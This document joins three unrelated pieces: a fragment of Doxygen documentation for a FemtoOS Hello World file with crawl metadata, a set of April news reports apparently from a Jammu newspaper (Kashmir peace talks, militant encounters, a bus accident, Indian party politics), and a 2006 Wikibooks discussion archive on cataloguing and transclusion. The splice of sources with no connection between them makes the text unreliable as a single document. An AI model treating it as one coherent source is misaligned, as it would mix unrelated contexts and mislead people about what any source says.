Using hide-by-signature semantics, when a function is called on an object, the compiler identifies the most derived class containing a function that could satisfy the function call. If there is only one function in the class that could satisfy the call, the compiler calls that function. If there is more than one function in the class that could satisfy the call, the compiler uses overload resolution rules to determine which function to call. For more information on overload rules, see Function Overloading.
A function in a base class may even have a signature that makes it a slightly better match than a function in a derived class, for a given function call. However, if the function was explicitly called on an object of the derived class, the function in the derived class will be called.
Because the return value is not considered part of a function's signature, a base class function will be hidden if it has the same name and takes the same number and type of arguments as a derived class function, but only differs in the type of the return value.
The following sample shows that a function in a base class is not hidden by a function in a derived class.
// hide_by_signature_1.cpp
// compile with: /clr
using namespace System;

ref struct Base {
   void Test() {
      Console::WriteLine("Base::Test");
   }
};

ref struct Derived : public Base {
   void Test(int i) {
      Console::WriteLine("Derived::Test");
   }
};

int main() {
   Derived ^ t = gcnew Derived;
   // Test() in the base class will not be hidden
   t->Test();
}
Output
Base::Test
The following sample shows that the Visual C++ compiler will call a function in the most derived class, even if a conversion is required to match one or more of the parameters, and not call a function in a base class that is a better match for the function call.
// hide_by_signature_2.cpp
// compile with: /clr
using namespace System;

ref struct Base {
   void Test2(Single d) {
      Console::WriteLine("Base::Test2");
   }
};

ref struct Derived : public Base {
   void Test2(Double f) {
      Console::WriteLine("Derived::Test2");
   }
};

int main() {
   Derived ^ t = gcnew Derived;
   // Base::Test2 is better match, but the compiler
   // will call a function in derived class if possible
   t->Test2(3.14f);
}
Output
Derived::Test2
The following sample shows that it is still possible to hide a function if the base class has the same signature as the derived class.
// hide_by_signature_3.cpp
// compile with: /clr
using namespace System;

ref struct Base {
   int Test4() {
      Console::WriteLine("Base::Test4");
      return 9;
   }
};

ref struct Derived : public Base {
   char Test4() {
      Console::WriteLine("Derived::Test4");
      return 'a';
   }
};

int main() {
   Derived ^ t = gcnew Derived;
   // Base::Test4 is hidden
   int i = t->Test4();
   Console::WriteLine(i);
}
Output
Derived::Test4 97
The following sample defines a component compiled with /clr:oldSyntax. Classes defined using Managed Extensions for C++ have hide-by-name member functions.
The following sample consumes the component built in the previous sample. Notice how hide-by-signature functionality is not applied to base classes of types compiled with /clr:oldSyntax.
// hide_by_signature_5.cpp
// compile with: /clr
using namespace System;
#using "hide_by_signature_4.dll"

ref struct Derived : public Base1 {
   void Test(int i, int j) {
      Console::WriteLine("Derived::Test");
   }
};

int main() {
   Derived ^ t = gcnew Derived;
   t->Test(8, 8);   // OK
   t->Test(8);      // OK
   t->Test();       // C2661
}
You can add tasks to the existing Rakefile which is in the project's root folder.
If you have a set of tasks that you use across Rails projects, you can put them in a file named Rakefile or a file with a .rake extension and add the file to the Libs > tasks folder in your project.
Put the file in the Libs > tasks folder so the file is automatically available to Rake.
To make a custom task appear in the Run Rake Task pop-up menu, the task must have a description (see the example below). The assumption is that non-documented targets are implementation targets and the documented ones are the ones you want to expose.
To make newly created custom tasks appear in the menu, right-click the project node and choose Run Rake Task > Refresh List.
To test this out, add the following task to either the Rakefile or to a .rake file in lib/tasks in a Rails project. Right-click the Projects node and choose Run Rake Task > Refresh List. Then choose Run Rake Task > db > schema_version. (Note: this task was taken from the Depot sample application).
namespace :db do
desc "Prints the migration version"
task :schema_version => :environment do
puts ActiveRecord::Base.connection.select_value('select version from schema_info')
end
end
If you have ideas of what to put in the generated Rakefile, you can add them to bug 117668.
Every week.
Never.
Only when stuff goes wrong!
What are you talking about?
Once a month.
At Least Daily
In practice do you consider a unplanned/unexpected server reboot a security incident?
I know that in theory it does (security incident = unexpected event) but I want to know what does everyone PRACTICE?'.
Thanks
Hey Hey,
I don't, personally, think that a reboot is enough to indicate a security incident. The concern may exist, but if I trust the safeguards in place, I'd first lean towards hardware issues... this comes in to play expecially with very new (relatively ununsed and therefore untested... may have conflicts with other parts of the server) and older software that may be on it's way out.
As far as handling, bring it back up (offline if you're suspicious) but check on the Event Log or /var/log/messages or whatever depending on the operating sytem... See if there's anything in there to explain the reboot. Also check if anyone was working around the error... I've seen lots of cases where people have tripped over a power bar or knocked a plug out and just put it back in real fast and snuck away because they don't want to accept blame.
As far as procedures.... that company policy should already be in place.... A call list is the best way... As for the security office.... Physical security should already be accounted for.. Any server rooms should be alarmed so that security is notified if the reboot is caused physically while no one is around. As far as proceding with or without security.... that again depends, if you have an outside party doing physical building security, do you really want them around your equipment? Are you authorized to access the room on your own (as the sys admin)?. The biggest thing for unexplained lockups/reboots/etc is to have a call list in place... Security (should it be reported to them) should know to contact the on-call technical support (if there's currently one in the building)... otherwise a list of technicians/administrators should be created and an order in which to contact them if there is a problem.
This is what I see around the office (for the most part) and what I've learned in class anyways... Some of the more experienced people will probably have a better answer.
Peace,
HT
IT Blog: .:Computer Defense:.
PnCHd (Pronounced Pinched): Acronym - Point 'n Click Hacked. As in: "That website was pinched" or "The skiddie pinched my computer because I forgot to patch"..
Oliver's Law:
Experience is something you don't get until just after you need it.
It is an (IT) incident for sure, but not necessarily a security incident. As SirDice said, it could be just plain old hardware failure. Or, an OS/application problem.
Generally speaking, incident is any event that is not part of the standard operation of a service and that causes an interruption (or reduction) in the service quality. Standard operation is defined within the Service Level Agreement (SLA) to users.
Some companies implement incident management for handling incidents. Users would call a help desk/service desk "agent" who records the incident. The agent is then the 1st level support, and has a checklist procedure and access to some monitoring tools. If s/he can't determine the root cause, s/he can escalate the incident (and turn it into a problem) to the appropriate 2nd level support, like the system administrator. When the problem has been solved, the agent will notify the user and close the incident.
Hi. I voted no. Mainly because after an unplanned reboot, a security problem does not first come to mind. I will usually think hardware problem and chase that.
But maybe I should change my thinking. In my neck of the woods, with the NOS's we use, server reboots don't happen too often.
MCNGP Thug # 39
:: The MCNGP :: We are building a better world for all of I.T.
--
Try BSDLive - Business card CD version.
I am with SirDice on this one.
"security" includes the integrity of your data and applications. Re-booting in mid-flight could corrupt both? that potential would also have to be addressed as part of your remedial preoced yes also. Unexpected reboot can have bad consequence (Downtime if your server is a public one like eCommerce) and it should be thread as critical.
-Simon \"SDK\"
Originally posted here by ric-o'.
If you want to impress your boss, try and implement ITIL.
Now I've got a question in return (I already know the answer ) :
Do you consider backups to be part of your security?
I think IT security is a component of the total information assurance umbrella not the other way around.
An inconsistent database due to a random reboot can, but does not have to, be a direct security incident per se.
A single random reboot or shutdown is cause for alarm and investigation but not a total DEFCON 5 freakout.
Having an implemented incident response plan is always a great idea. Regardless of severity, it's a good idea to report up the chain of command any incident to ensure proper communication and documentation.
A new security triad, CPP, redefines the three main areas of security: Cyber (computer, network and information security), Physical (the wires, silicon, glass and structures) and People (employees, consultants, suppliers, partners and anyone in contact with your company).
\"You got a mouth like an outboard motor..all the time putt putt putt\" - Foghorn Leghorn
cloud-init is used with windows too. See the documentation for
bootstrapping Windows stacks.
EurekaLog exposes several event handlers like OnExceptionNotify.
You can implement these in your code. For example:
procedure EurekaLogExceptionNotify(
  EurekaExceptionRecord: TEurekaExceptionRecord; var Handled: Boolean);
Here you can see a TEurekaExceptionRecord, which is defined in ExceptionLog.pas. But maybe you just own the non-source version, which works just fine.
The record has a EurekaExceptionRecord.CallStack list. This proprietary list can be converted to TStrings using the CallStackToStrings method, which is also defined in the ExceptionLog unit.
Here is an example where I write the CallStack into a StringList.
CallStackList := TStringList.Create;
try
CallStackToStrings(EurekaExceptionRecord.CallStack, CallStackList);
LogMessage := 'An unhandled exception occured. He
Throw an exception and catch it immediately. I'm not familiar enough with C
but in java this would look like this:
try {
throw new RuntimeException("bla bla");
} catch (Exception ex) {
ex.printStackTrace();
}
This is not the full code, but it should help you.
When you work with multiple workbooks keep track of them. For example start
with:
Dim CurrWB As Workbook
Set CurrWB = ActiveWorkbook
Then in the cycle:
Dim WB As Workbook
For Each StrFile In var
Set WB = Workbooks.Open(loc & StrFile)
...
WB.Close
Next StrFile
Inside the cycle you can find the area to copy doing something like:
R1 = 1
Do While WB.Sheets("Sheet name").Cells(R1, 2) <> "Starting text"
R1 = R1 + 1
Loop
R2 = R1 + 1
Do While WB.Sheets("Sheet name").Cells(R2, 2) <> "Ending text"
R2 = R2 + 1
Loop
For R = R1 to R2
CurrWB.Sheets("Report").Cells(RReport, 3) = WB.Sheets("Report").Cells(R,
3)
RReport = RReport + 1
Next R
There's no standard for the structure of a reply email. It's not usually
done using multipart email, it just uses human-readable text, often with
> prefixes to denote quoted text. This allows replies to be interspersed
inline with the quoted material.
The only standard features of replies are a couple of headers:
In-Reply-To: <ID>
and
References: <ID1>, <ID2>, <ID3>, ...
In-Reply-To contains the message ID of the message that was replied to.
References is a growing list of message IDs -- when you reply, you take the
original message's reference list and append the ID of the message being
replied to at the end.
See RFC 5322 for more details about these headers.
Incorrect.
There's one kernel address space, and no kernel processes.
There are kernel threads, and there are user space threads that enter the
kernel. These run in the kernel address space.
Each of these has a separate stack, within the kernel address space.
Look at the MODULE, ACTION and CLIENT_INFO columns of V$SESSION.
Then, in the package(s) and/or trigger(s) you suspect are performing the
update, call DBMS_APPLICATION_INFO.SET_MODULE and
DBMS_APPLICATION_INFO.SET_ACTION:
BEGIN
DBMS_APPLICATION_INFO.SET_MODULE(trigger_name, 'trigger start');
-- some code...
DBMS_APPLICATION_INFO.SET_ACTION('updating employee');
-- code which updates the employee table
DBMS_APPLICATION_INFO.SET_ACTION('doing something else');
-- more code...
DBMS_APPLICATION_INFO.SET_MODULE(NULL, NULL);
END;
See also the example provided in the usage notes.
To correct a fluorescence signal bleaching over time, consider using the
bleach corrector plugin for ImageJ.
When thresholding a stack in ImageJ you can calculate the threshold
separately for each slice:
Image > Adjust > Threshold...
leave Stack histogram unchecked to get a preview for the threshold
calculated based on the current slice
click on Apply
in the dialog, choose Calculate threshold for each image to apply the
chosen thresholding method to each stack slice separately.
In order to get the macro source code for this procedure, start the ImageJ
macro recorder via Plugins > Macros > Record... before starting.
The stacks are exactly the same. One can write a program mixing assembly and C, and both use the same stack.
The C compiler uses some conventions on how to use the stack: a well-formed stack frame is filled in at each function entry and cleaned up when the function returns. There are compiler directives specific for altering the stack management. For example: gcc stack checking.
Some references on the web: google: c stack frame
In Assembly, the stack has to be managed entirely by the programmer. It is good practice to have rules on how to manage the stack (mimicking the C rules, for example).
The stack management instructions are also quite processor dependent (instructions like push and pop on x86, or stmia / ldmfd on ARM). Similarly, some processors have dedicated registers for stack pointers.
NSInteger index = 0;
for (UIViewController *view in self.navigationController.viewControllers) {
if([view.nibName isEqualToString:@"YourViewController"]) // put any XIB name where you want to navigate
break;
index = index + 1;
}
//[[self navigationController]
pushViewController:[[self.navigationController viewControllers]
objectAtIndex:index] animated:YES];
[[self navigationController]
popToViewController:[[self.navigationController viewControllers]
objectAtIndex:index] animated:YES];
Depends on the context, but besides the algorithmic structure, stack
usually means the technology your platform is built upon.
Example:
Stack on networking could mean: TCP/IP, SSH, Bluetooth or the different
technologies providing you connectivity.
Stack on OS means the OS itself and the libraries available for your use.
Stack on Programming languages might be the Java EE stack, which means your code will be leveraging the Java Enterprise APIs.
Hope it made sense. :)
"Stack hog" is an informal name used to describe functions that use
significant amounts of automatic storage (AKA "the stack"). What exactly
counts as "hogging" varies by the execution environment: in general,
kernel-level functions have tighter limits on the stack space - just a few
kilobytes, so a function considered a "stack hog" in kernel mode may become
a "good citizen" in user mode.
A common reason for a function to become a stack hog is allocating buffers
or other arrays in the automatic memory. This is more convenient, because
you do not need to remember to free the memory and check the results of the
allocation. You could also save some CPU cycles on the allocation itself.
The downside is the possibility of overflowing the stack, which results in a
panic for kernel-level programs. Tha
There is, for instance, LinkedList which implements Deque, which has
methods to be used as either a Stack or Queue. There's even a Stack class,
but it doesn't belong to the Collections Framework.
In Visual C++ the default stack size is managed by the linker option /STACK
(doc). By default it is 1 MB.
Note that each new thread will have its own stack, and you can specify the
initial size with parameter dwStackSize in function CreateThread. If it is
0 it will default to the one used in the linker command.
About your other questions, there is no way to query the current/maximum
stack size. To avoid problems it is better to use the heap for any
significant memory allocation.
The easiest and the fastest way to do this, if you are (or wish to be) familiar with the data.table package, is this way (not tested):
require(data.table)
in_pth <- "path_to_csv_files" # directory where CSV files are located,
not the files.
files <- list.files(in_pth, full.names=TRUE, recursive=FALSE,
pattern="\\.csv$")
out <- rbindlist(lapply(files, fread))
list.files parameters:
full.names = TRUE will return the full path to your file. Suppose your
in_pth <- "c:\\my_csv_folder" and inside this you've two files: 01.csv
and 02.csv. Then, full.names=TRUE will return c:\my_csv_folder\01.csv and
c:\my_csv_folder\02.csv (full path).
recursive = FALSE will not search inside directories within your in_pth
folder. Assume you've two more csv files in
c:\my_csv_folder\another_folder.
This looks like Intel x86 at first sight. 'Something' is usually the total length of all local (stack-allocated) variables if this appears at the beginning of an assembly subroutine. Since the stack grows downwards, i.e. towards lower addresses, this reserves space for them.
Are you sure the second line is exactly what you wrote? esp is already
pointing to free area so before your routine calls itself recursively or
calls another function the parameters can be pushed on the stack below your
locals. I don't see the point of loading something to esp right after it
was adjusted to accommodate the local vars unless it is used to allow the
(next) callee to access the caller's stack frame, like in Pascal when you
have nested functions.
I'm not sure I fully understand the issue, but here's some advice that I
hope is useful:
A UINavigationController is especially well suited for a stack of vcs,
especially, it seems to me, in the case you present.
The main vc can check the user's logged in state and either present the
login vc or not. It can begin by assuming the user has more than one game
to choose from and build the vc stack as follows:
- (void)viewDidAppear:(BOOL)animated {
// notice I moved the logical or to make the BOOL more meaningful
BOOL isUserLoggedIn = [[NSUserDefaults standardUserDefaults]
boolForKey:@"userLoggedIn"] || (!setAuthenticationKey ||
[setAuthenticationKey isKindOfClass:[NSNull class]]);
if (!isUserLoggedIn) {
SelectGameVC *selectGameVC = // not sure how you build this, eith
Linux 2.6.18-194.el5 #1 SMP Tue Mar 16 21:52:39 EDT 2010 x86_64
... followed by 4 bytes for pointer "p" ...
You are on a 64 bit architecture, so a pointer occupies 64 bit = 8 bytes:
#include <stdio.h>
int main() {
int a = 0x12345678;
int *p = &a;
printf("%zu\n", sizeof(p));
printf("%zu\n", sizeof(a));
return 0;
}
$ gcc -std=c99 -Wall -pedantic -o sample sample.c
$ ./sample
8
4
Detailed stack analysis:
When entering func(), after executing the first two instructions, the stack
looks like this (assumed that each rectangle is 4 bytes of memory):
0x0000000000400528 <func()+0>: push %rbp
0x0000000000400529 <func()+1>: mov %rsp,%rbp
+..........+
| RET ADDR | (from CALL)
+----------+
|RBP (high)|
+..........|
|RBP (low) | <== RSP,
That will work provided the arithmetic is done correctly. My usual bug is
being off-by-one on such things.
You might also have a look at the enter and leave instructions to do
something similar.
Yes, it's possible, you just need to remove and then re-add all of the
items in the stack.
public static void PushUnique<T>(this Stack<T> stack, T item
, IEqualityComparer<T> comparer = null)
{
comparer = comparer ?? EqualityComparer<T>.Default;
var otherStack = new Stack<T>();
while (stack.Any())
{
var next = stack.Pop();
if (!comparer.Equals(next, item))
otherStack.Push(next);
}
foreach (var next in otherStack)
stack.Push(next);
stack.Push(item);
}
Try this:
#middle{
z-index:10;
border-radius:10px;
border:15px solid #232323;
background: #232323;
width:400px;
height:200px;
text-align:center;
top:180px;
left: 50%;
margin-left: -215px; /* This is half the total width (width + border +
padding) */
position:absolute;
}
Yes threads have their own stacks and their own kernel stacks (e.g. linux).
When a thread makes a system call, you trap into kernel mode (from user
mode), you pass the arguments to the kernel, the arguments are checked, the
kernel does whatever it needs to do (on the kernel stack), returns the final
value back to the thread and you go back to user mode.
You can create a new thread with the stacksize you want...
var tcs = new TaskCompletionSource<BigInteger>();
int stackSize = 1024*1024*1024;
new Thread(() =>
{
tcs.SetResult(Factorial(10000));
},stackSize)
.Start();
var result = tcs.Task.Result;
But as mentioned in the comments, an iterative approach would be better.
None of the built in positions quite do this, and geom_dotplot isn't quite
right either because it only works in one dimension. I've cobbled together
a new position which does the right sort of thing, but requires manual
tweaking to get everything right.
library("proto")
PositionNudge <- proto(ggplot2:::Position, {
objname <- "nudge"
adjust <- function(., data) {
trans_x <- function(x) {
lx <- length(x)
if (lx > 1) {
x + .$width*(seq_len(lx) - ((lx+1)/2))
} else {
x
}
}
trans_y <- function(y) {
ly <- length(y)
if (ly > 1) {
y + .$height*(seq_len(ly) - ((ly+1)/2))
} else {
y
}
}
ddply(data, .(group), transform_position, trans_x=trans_x,
trans_y=trans_y)
}
})
char time_buf[32] = {0};
/* format time as `14 Jul 20:00:08`, and exactly 16 bytes */
strftime(time_buf, sizeof(time_buf), "%d %b %H:%M:%S",
localtime(&now));
nb_bytes = snprintf(msg, sizeof(msg), "%s", time_buf);
So effectively time_buf and msg contain the same data. snprintf returns the
number of characters that would have been successfully written to msg not
counting the null character.
vsnprintf(msg + nb_bytes, MAX_LOG_MSG_SZ, fmt, ap);
You are trying to write from the address given by msg+nb_bytes. You had 16
characters in msg. But you claim that you have MAX_LOG_MSG_SZ which is 32
characters. You are trying to write to end of the string. Perhaps fmt
contains more than 15 characters.
vsnprintf(msg + nb_bytes, MAX_LOG_MSG_SZ - nb_bytes, fmt, ap);
This time you properly subtract nb_bytes from the available size, so the write cannot run past the end of msg.
Your push should be
(*top)++;
stack[*top] = value;
That is first increment to the next empty position and then insert. The top
variable always points to the top element. Therefore to push, first
increment then assign. To pop, first extract the value at top and then
decrement.
Note: the above two lines can be combined into stack[++(*top)] = value.
In the current code, at the first push, your stack[*top++] = item uses the post-increment, so it attempts to assign the value at the current value of *top, which is -1, and only then increments, which is wrong.
With respect to this modification of the push routine, the pop routine is okay.
There is no way to create objects on the stack in Java. Java also has
automatic garbage collection, so you don't have any way of deleting
objects. You just let all references to them go out of scope and eventually
the garbage collector deals with them. | http://www.w3hello.com/questions/Getting-information-from-one-CloudFormation-stack-to-use-in-another | CC-MAIN-2018-17 | refinedweb | 2,254 | 56.55 |
Handling NACKs
Re: Handling NACKs in the gateway
Is it possible to catch a NACK in the code? Say, to make an if (NACK) { Do stuff }?
the send() function returns true if message reached the first stop on its way to destination.
@electrik - ok, so something like:
void loop() { NACK = send(message to send); if (NACK == 0) { Do stuff } }
@electrik hi. This is fine for a node where the code is part of the node sketch. However, because the gateway code is built into the libraries, it is difficult to implement in the gateway. As on the other thread, one answer may be to change the controller code to request a confirmation of delivery from the gateway. In my case, I am using the generic MQTT thing in openHAB so I'm not sure how, to be honest, but will have a think.
@4994james - thanks James, but that's why I created a new thread; I'm interested in the node part: to create some sort of radio tester where you can send a message each second, get a NACK or ACK, and then output a signal/LED when everything is fine, to get some sort of coverage map of my house.
@sundberg84 sounds similar to ?
@sundberg84 yes exactly. I can look for a detailed example later
This what I borrowed and extended once
boolean resend(MyMessage &msg, int repeats) // Resend messages if not received by gateway
{
  int repeat = 0;
  int repeatDelay = 0;
  boolean ack = false;
  uint8_t i;

  while (ack == false && repeat < repeats) {
    wait(repeatDelay);
    if (send(msg)) {
      ack = true;
    } else {
      ack = false;
      if (repeatDelay < 500) repeatDelay += 100;
    }
    repeat++;
  }
  return (ack);
}
you can call it like the normal send function
resend(msg, 3);
- karlheinz2000 last edited by
I count in every node if send() returns false and send the number to the controller to get an idea about RF quality.
I do not retry, because MySensors already retries, right?
I use NRF24 and RFM69. Behavior is sometimes strange. No NACKs for weeks and then a really high number of NACKs for a few days. Setup not changed. I have no idea why... Same for indoor and outdoor sensors.
@karlheinz2000 - interesting, like a incrementing pulsecounter? Or what kind of sensor do you present to do this? Im thinking for a batterynode.
- karlheinz2000 last edited by
@sundberg84 - yes, it's just a 16bit incrementing counter. It counts all NACKs as long as the node is not reset.
Before node goes to sleep, node sends the total number of NACKs. I'm using V_ID for that. Controller (FHEM) calculates then delta NACKs between two sends -> "lost messages". The lost messages are counted day by day separately. So I can easily see when during the day the lost messages rise and can also compare values day by day.
I'm not using presentation that much. For most nodes I configure the controller manually. So I'm more flexible in which variables I can use in which context.
- BearWithBeard last edited by BearWithBeard
Yeah, using the return value of send() is a neat and simple way to get a rough estimate of how reliable a connection is. In my weather station prototype, I transmit up to 8 different sensor values every 5 minutes (if they exceeded a specified threshold compared to the previous measurement) and increase a tx_errors variable with each NACK, then send that value at the end of each transmission period. tx_errors gets reset to 0 if its send() function returned true. If it sends a 0, it means that there were no transmission errors. This way it doubles as a heartbeat.
@electrik said in Handling NACKs:
boolean resend(MyMessage &msg, int repeats) // Resend messages if not received by gateway { [...] if (send(msg)) [...] }
I guess that you know that, but just to clarify: This code does not tell you that the gateway (destination node) received the message, unless the sending node is directly connected to it. Hardware ACK, via the return value of send(), only tells you that the first node (the sender's parent) on the way to the destination received the message.
If you want to ensure that the gateway / destination received the message, you have to request an echo (send(msg, true)) and listen for it in receive(). Something like that:
void receive(const MyMessage &message)
{
  if (message.isEcho()) {
    // You received the echo
  }
}
Note: If you are using a MySensors version lower than the current 2.3.2, then isEcho() is called isAck().
@BearWithBeard @karlheinz2000 - this is gold, thank you. I'm going to be a bit more annoying here
What about doing this to a repeater?
I have 3 main repeaters in my house. Do you know if it would be possible to catch the NACK / OK results from all repeated messages? I guess we are talking about changing the core code?
Would be awesome to collect hourly OK and NACK counts and send them to the controller for these three repeaters. It would indicate issues both with those three main nodes and with the network as a whole.
- BearWithBeard last edited by
@sundberg84 Statistics are awesome, I like your thought!
But I'm afraid that you are right: There seems to be no easy way to get TX success indicators outside of the sending node. At least not without changes to the library.
You can either ...
- verify that the parent of the sender received the message (hardware ACK), or
- verify that the destination (generally the gateway) received the message (software ACK / echo),
... but not if any of the parents successfully passed the message on.
I guess, if you really wanted to, you could use direct node-to-node communication: On your sensor node, send the message to the nearest repeater, handle the message in receive() on the repeater and send it manually to the next repeater, until you reach the gateway. Then you should have full control over monitoring hardware ACK, at the cost of having a completely static network. I don't think that's desirable though...
Maybe the indication handler could be used to count transmission failures?
I'm counting the send() fails and send that at intervals to the gateway as a child sensor.
This won't work of course for repeaters, so I guess @mfalkvidd's idea would do the trick.
Or alternatively send dummy data, just to check the connection.
@karlheinz2000 said in Handling NACKs:
I use NRF24 and RFM69. Behavior is sometimes strange. No NACKs for weeks and then a really high number of NACKs for a few days. Setup not changed. I have no idea why... Same for indoor and outdoor sensors.
I've had similar effects and could relate this back to the gateway. I'm using an MQTT gateway and if that has Wifi connection issues, it is trying to reconnect to the network in a loop. During these retries it can't handle the NRF communication, if there are more messages than fit in the buffer.
After solving these Wifi issues (updated the ESP32 core) and using the latest Mysensors release, things work much better.
@mfalkvidd - do you have a pointer to where I can start, bear in mind Im a very bad coder so I need somewhere to start following the logic.
@sundberg84 seems like it isn't very well documented, but has some information.
increasing a counter for every INDICATION_ERR_TX and another counter for every INDICATION_TX could be sufficient to get a good ratio of how many successful and failed transmissions there are.
Edit: might be better to start from
Something like this should work. Not sure if a power meter is the best way to present it to the controller; feel free to use something better.
// Enable debug prints to serial monitor
#define MY_DEBUG

// Enable and select radio type attached
#define MY_RADIO_RF24
//#define MY_RADIO_NRF5_ESB
//#define MY_RADIO_RFM69
//#define MY_RADIO_RFM95

// Enabled repeater feature for this node
#define MY_REPEATER_FEATURE
#define MY_INDICATION_HANDLER

static uint32_t txOK = 0;
static uint32_t txERR = 0;

#define REPORT_INTERVAL 300000 // Report every 5 minutes
#define CHILD_ID_TX_OK 1
#define CHILD_ID_TX_ERR 2

#include <MySensors.h>

MyMessage txOKmsg(CHILD_ID_TX_OK, V_KWH);
MyMessage txERRmsg(CHILD_ID_TX_ERR, V_KWH);

void indication(indication_t ind)
{
  switch (ind) {
    case INDICATION_TX:
      txOK++;
      break;
    case INDICATION_ERR_TX:
      txERR++;
      break;
  }
}

void setup()
{
}

void presentation()
{
  // Send the sensor node sketch version information to the gateway
  sendSketchInfo(F("Repeater Node"), F("1.0"));
  present(CHILD_ID_TX_OK, S_POWER);
  present(CHILD_ID_TX_ERR, S_POWER);
}

void loop()
{
  static unsigned long last_send = 0;
  if (millis() - last_send > REPORT_INTERVAL) {
    send(txOKmsg.set(txOK));
    send(txERRmsg.set(txERR));
    last_send = millis();
  }
}
The same could probably be added to any gateway sketch.
@mfalkvidd - appreciate you time here, should have taken me hours and hours!
@sundberg84 you're welcome. I'm trying to add the feature to one of my gateways now (I don't have any repeaters).
@mfalkvidd I won't sleep tonight now! - Can't wait to see how it works out in the 'real world' for you....
@skywatch so far it is not showing anything interesting. On the other hand, I don't think my GW will transmit anything (no nodes request anything from the controller). This is what it looks like in Domoticz:
I'll let it run overnight, will post an update tomorrow.
As expected, there have been no errors recorded. The number of TX OK per hour is constant.
Domoticz log file shows that the gateway reports every 5 minutes.
Maybe the gateway should look at INDICATION_GW_TX.
@mfalkvidd - INDICATION_GW_TX sounds like a good plan. This is a great tool I think for the future to evaluate and debug your network. I used S_CUSTOM and a utility meter (hourly) in HA to get the values.
Just started up, first values in - will report back when I have more data:
No errors so far
Just so I understand: case INDICATION_ERR_TX: means NACK ?
@sundberg84 I think so. (I've cut out some code for brevity)
const bool result = transportSendWrite(route, message);
#if !defined(MY_GATEWAY_FEATURE)
// update counter
if (route == _transportConfig.parentNodeId) {
  if (!result) {
    setIndication(INDICATION_ERR_TX);
    _transportSM.failedUplinkTransmissions++;
  } else {
    _transportSM.failedUplinkTransmissions = 0u;
  }
}
#else
if (!result) {
  setIndication(INDICATION_ERR_TX);
}
#endif
/**
 * @brief Send message to recipient
 * @param to Recipient of message
 * @param message
 * @return true if message sent successfully
 */
I guess we could use _transportSM.failedUplinkTransmissions instead of using our own counter.
@mfalkvidd said in Handling NACKs:
I guess we could use _transportSM.failedUplinkTransmissions instead of using our own counter.
That one is reset when a message is sent successfully, and we want to know the total number of failed msgs right?
Something strange happened last hour:
But at least now I know something is up.
@sundberg84 said in Handling NACKs:
Something strange happened last hour:
@sundberg84 - OMG, I have sat through whole films with less suspense than this thread! ......
@sundberg84 that's a very nice visual representation. Could you share how you set that up in HA?
@mfalkvidd - it's actually Grafana and an InfluxDB database. So HA sends values to Influx, which are visually presented in Grafana. I'm sure you can do this from Domoticz as well... there are some limitations in the Influx db so I might change to another database in the future which suits me better.
@sundberg84 sorry for going off topic, but what limitations have you experienced?
I've been thinking about using something better than Domoticz for a long time. Maybe Grafana is the way to go.
- BearWithBeard last edited by BearWithBeard
@mfalkvidd Domoticz is a full-blown home automation system, isn't it? Grafana is just a monitoring dashboard that pulls data from a time-series database (like InfluxDB) and generates fancy graphs. It can't automate and control things or send commands other than alarms (eg. if a value exceeds a threshold, or no new data came in since x minutes, send an email).
One of InfluxDB's limitations is that you can't use math operations (or only some basic ones) on db queries, which may limit what you can graph in Grafana. Also, changing data types of existing fields in measurements is not possible, which is annoying, because Grafana treats values differently based on their data type. @sundberg84 can probably name more limitations. I'd love to switch to Carbon / Graphite for data collection and storage... if only it wouldn't take time to read up, setup and migrate all the data.
By the way - great idea to use the indication handler to log radio reliability!
Definitely going to implement this on my repeaters when I find the time.
@mfalkvidd - @BearWithBeard said it. The limitations are mostly math related. For example, you can't show a graph with current and last year's values (timeshift) on the same graph, due to that limitation in InfluxDB. I want to compare power usage this day to the same day last year; not possible. I'm looking to change to Graphite as well instead of Influx.
Moving from Domoticz to HA was a great move for me, but not as I thought. I'm using HA more or less just as an umbrella. I would say I'm using only the OS Hass.IO and not using Home Assistant that much. What's good in Home Assistant is that it's quite easy to integrate different protocols like MySensors or whatever you use. But after that I don't use Home Assistant much, but rather the great possibility to have add-ons on Hass.IO. I use Node-RED for all my automations (extremely easy compared to code!), Influx + Grafana for visuals, motionEyeOS for camera security and more... all you have to do is install the add-on from the "store" and you are more or less ready to go. These add-ons I'm sure you can install with Domoticz as well if you like the integrations with the different protocols there.
I think we have handled the NACK questions, so no worries for me if we go off topic, but if you'd rather, send me a DM.
I just love this idea. Implemented the code on my second now, one to go.
@sundberg84 very nice. I'm happy we were able to implement it with so little effort. What does your graph look like now?
Mine is very boring, as I suspected. Don't have any outgoing traffic from my GW. Will have to add it to my nodes to get any useful data.
@mfalkvidd I didn't find time yet to implement more. But very good for two repeaters.
- alowhum Plugin Developer last edited by
Very cool stuff.
@mfalkvidd Would it be possible to create the functionality, but to measure the successrate of outgoing messages from the gateway node?
For example, I'l love to be able to see how often the controller/gateway tries to toggle a distant node, but fails.
- alowhum Plugin Developer last edited by
Ah, now I see. Thanks! | https://forum.mysensors.org/topic/10947/handling-nacks/33?lang=en-US | CC-MAIN-2020-24 | refinedweb | 2,423 | 65.42 |
form_field(3x)                                                form_field(3x)

NAME
       form_field - make and break connections between fields and forms

SYNOPSIS
       #include <form.h>
       int set_form_fields(FORM *form, FIELD **fields);
       FIELD **form_fields(const FORM *form);
       int field_count(const FORM *form);
       int move_field(FIELD *field, int frow, int fcol);

DESCRIPTION
       The function move_field moves the given field (which must be discon-
       nected) to a specified location on the screen.

RETURN VALUE
       The function form_fields returns a pointer (which may be NULL). It
       does not set errno. The function field_count returns ERR if the form
       parameter is NULL. The functions set_form_fields and move_field
       return one of the following codes on error:

       E_OK              The routine succeeded.
       E_BAD_ARGUMENT    Routine detected an incorrect or out-of-range
                         argument.
       E_CONNECTED       The field is already connected to a form.
       E_POSTED          The form is already posted.
       E_SYSTEM_ERROR    System error occurred (see errno(3)).

SEE ALSO
       curses(3x), form(3x).

NOTES
       The header file <form.h> automatically includes the header file
       <curses.h>.

PORTABILITY
       These routines emulate the System V forms library. They were not
       supported on Version 7 or BSD versions. The SVr4 forms library
       documentation specifies the field_count error value as -1 (which is
       the value of ERR).

AUTHORS
       Juergen Pfeifer. Manual pages and adaptation for new curses by
       Eric S. Raymond.
#include "femtoos_code.h"
Prototype for the general initialization.
This is the first application code called. It is called only after a reset, thus in principle once.
Definition at line 44 of file code_TestHelloWorld.c.
Definition at line 52 of file code_TestHelloWorld.c.
References portFlashReadByte, speed, taskDelayFromNow(), Tchar, Tuint08, and Tuint16.
Definition at line 71 of file code_TestHelloWorld.c.
References speed, taskDelayFromNow(), and Tuint08.
Definition at line 42 of file code_TestHelloWorld.c.
This file is solely for demonstration purposes.
